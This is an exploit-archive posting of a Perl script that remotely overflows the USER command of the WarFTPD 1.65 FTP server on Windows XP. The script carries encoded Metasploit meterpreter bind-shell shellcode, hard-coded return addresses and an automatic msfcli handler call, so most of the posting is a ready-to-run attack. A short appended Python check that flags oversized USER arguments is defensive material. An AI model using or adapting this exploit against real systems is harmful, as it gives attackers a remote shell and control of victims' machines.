
WarFTPD 1.65 Buffer Overflow

Posted Jun 29, 2010
Authored by mr.pr0n

WarFTPD version 1.65 USER remote buffer overflow exploit.

tags | exploit, remote, overflow
SHA-256 | e6546c6df1507850819e3f17350110c5e82baa33b4be814da0753b293680e7b7




# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English]
# Date: 26/6/2010
# Author: mr.pr0n
# Software Link: [download link if available]
# Version: WarFTPD 1.65
# Tested on: Windows XP Pro SP2 / SP3 [English]
# CVE : [if exists]
# Code :

#!/usr/bin/perl

use IO::Socket;

print "\n#----[ mr.pr0n ]--------------------------------------------------------#\n";
print "# Target App: WarFTPD 1.65 (USER). #\n";
print "# Attack : Remote Buffer Overflow Exploit. #\n";
print "# Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3]. #\n";
print "#----------------------------------------[http://www.p0wnbox.com]-------#\n";
print "\nEnter your target's IP (e.g.: 192.168.0.123)\n";
print "> ";
$target=<STDIN>;
chomp($target);
print "Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)\n";
print "> ";
$sp=<STDIN>;
chomp($sp);

if ($sp == 2) {
# Let's define the RET, if our target is Windows SP2.
$RET= "\x72\x93\xab\x71"; # ws2_32.dll push ESP - ret
}
elsif ($sp == 3)
{
# Let's define the RET, if our target is Windows SP3.
$RET= "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret
}
else {
print "[-] Wrong version of Windows XP Service Pack!\n";
exit(1);
}

# We need 485 bytes to overwrite the EIP.
$junkBytes = "\x41" x 485; # Send 485 "A".

# We need 569 bytes to overwrite the SEH handler.
$junkBytes_2 = "\x41" x 84; # Send (485 + 84 =) 569 "A".


#-----------------------------------------------------------------------------------------------------------------------#
#[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b '\x00\x0a\x0d\x40' -t c #
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) #
#-----------------------------------------------------------------------------------------------------------------------#

#-----------------------------------------------#
# windows/meterpreter/bind_tcp - 326 bytes #
# http://www.metasploit.com #
# Encoder: x86/shikata_ga_nai #
# Bad Characters: \x00, \x0a, \x0d, \x40 #
# LPORT=4444 #
#-----------------------------------------------#

$shellcode =
"\xdb\xd3\x33\xc9\xd9\x74\x24\xf4\xb1\x4b\xba\xab\x11\xad\x09".
"\x5b\x83\xeb\xfc\x31\x53\x16\x03\x53\x16\xe2\x5e\xed\x45\x80".
"\xa0\x0e\x96\xf3\x29\xeb\xa7\x21\x4d\x7f\x95\xf5\x06\x2d\x16".
"\x7d\x4a\xc6\xad\xf3\x42\xe9\x06\xb9\xb4\xc4\x97\x0f\x78\x8a".
"\x54\x11\x04\xd1\x88\xf1\x35\x1a\xdd\xf0\x72\x47\x2e\xa0\x2b".
"\x03\x9d\x55\x58\x51\x1e\x57\x8e\xdd\x1e\x2f\xab\x22\xea\x85".
"\xb2\x72\x43\x91\xfc\x6a\xef\xfd\xdc\x8b\x3c\x1e\x20\xc5\x49".
"\xd5\xd3\xd4\x9b\x27\x1c\xe7\xe3\xe4\x23\xc7\xe9\xf5\x64\xe0".
"\x11\x80\x9e\x12\xaf\x93\x65\x68\x6b\x11\x7b\xca\xf8\x81\x5f".
"\xea\x2d\x57\x14\xe0\x9a\x13\x72\xe5\x1d\xf7\x09\x11\x95\xf6".
"\xdd\x93\xed\xdc\xf9\xf8\xb6\x7d\x58\xa5\x19\x81\xba\x01\xc5".
"\x27\xb1\xa0\x12\x51\x98\xac\xd7\x6c\x22\x2d\x70\xe6\x51\x1f".
"\xdf\x5c\xfd\x13\xa8\x7a\xfa\x54\x83\x3b\x94\xaa\x2c\x3c\xbd".
"\x68\x78\x6c\xd5\x59\x01\xe7\x25\x65\xd4\xa8\x75\xc9\x87\x08".
"\x25\xa9\x77\xe1\x2f\x26\xa7\x11\x50\xec\xc0\xe3\x75\x5c\x87".
"\x01\x89\x72\x0b\x8f\x6f\x1e\xa3\xd9\x38\xb7\x01\x3e\xf1\x20".
"\x79\x14\xae\xf9\xed\x20\xb9\x3e\x11\xb1\xec\x6c\xbe\x19\x66".
"\xe7\xac\x9d\x97\xf8\xf8\xb5\xc0\x6f\x76\x54\xa3\x0e\x87\x7d".
"\x51\xd1\x1d\x7a\xf3\x86\x89\x80\x22\xe0\x15\x7a\x01\x7a\x9f".
"\xee\xe9\x15\xe0\xfe\xe9\xe5\xb6\x94\xe9\x8d\x6e\xcd\xba\xa8".
"\x70\xd8\xaf\x60\xe5\xe3\x99\xd5\xae\x8b\x27\x03\x98\x13\xd8".
"\x66\x18\x6f\x0f\x4f\x9e\x99\x3a\xa3\x62\x6f";

if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
# Default FTP Port!
PeerPort => "21",
Proto => "TCP"))
{
print "\n[*] Sending Buffer at: $target ...\n";
# This is our Buffer, we are sending a long username with the USER ftp command.
$exploit = "USER ".$junkBytes.$RET.$junkBytes_2.$shellcode;
print $socket $exploit."\r\n";
# Hey, wait only for a sec!
sleep(1);
close($socket);
print "[*] Exploitation Done!\n";

# Connect to the victim with metasploit.
$command = "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E\n";
system ($command);
}

else
{
print "[-] Connection to $target failed!\n";
}

# That's all Folks ;)
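
Seen from the defender's side, the request this script sends stands out on the FTP control channel: a USER argument hundreds of bytes long, padded with one repeated byte and carrying non-printable data. The Python check below is an added example, not part of the original posting; the thresholds and function names are assumptions, and the sample traffic is constructed.

```python
import re

# Assumed policy thresholds for this example; tune them for your environment.
MAX_USER_LEN = 64      # real FTP account names are far shorter than this
MAX_REPEAT_RUN = 32    # a long run of one byte is typical overflow padding

_REPEAT = re.compile(rb"(.)\1{%d,}" % (MAX_REPEAT_RUN - 1), re.DOTALL)


def inspect_ftp_line(raw: bytes) -> list:
    """Return the reasons a client control-channel line looks like an
    oversized-USER overflow attempt (empty list means nothing flagged)."""
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    if verb.upper() != b"USER":
        return []
    reasons = []
    if len(arg) > MAX_USER_LEN:
        reasons.append("user-arg-too-long:%d" % len(arg))
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable-bytes")
    if _REPEAT.search(arg):
        reasons.append("repeated-byte-padding")
    return reasons


def scan(lines):
    """Yield (index, reasons) for every flagged line in a captured session."""
    for i, raw in enumerate(lines):
        reasons = inspect_ftp_line(raw)
        if reasons:
            yield i, reasons


# Constructed sample traffic. The oversized line only mirrors the layout in the
# script above (485 filler bytes, 4 address bytes, 84 filler bytes, then binary
# data); the non-filler bytes are inert placeholders.
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + b"A" * 485 + b"\xde\xad\xbe\xef" + b"A" * 84 + b"\xcc" * 16 + b"\r\n",
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE):
        print(idx, why)
```

The same three conditions translate directly into an FTP-aware proxy or IDS rule that drops or alerts on the USER command before it reaches the server.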



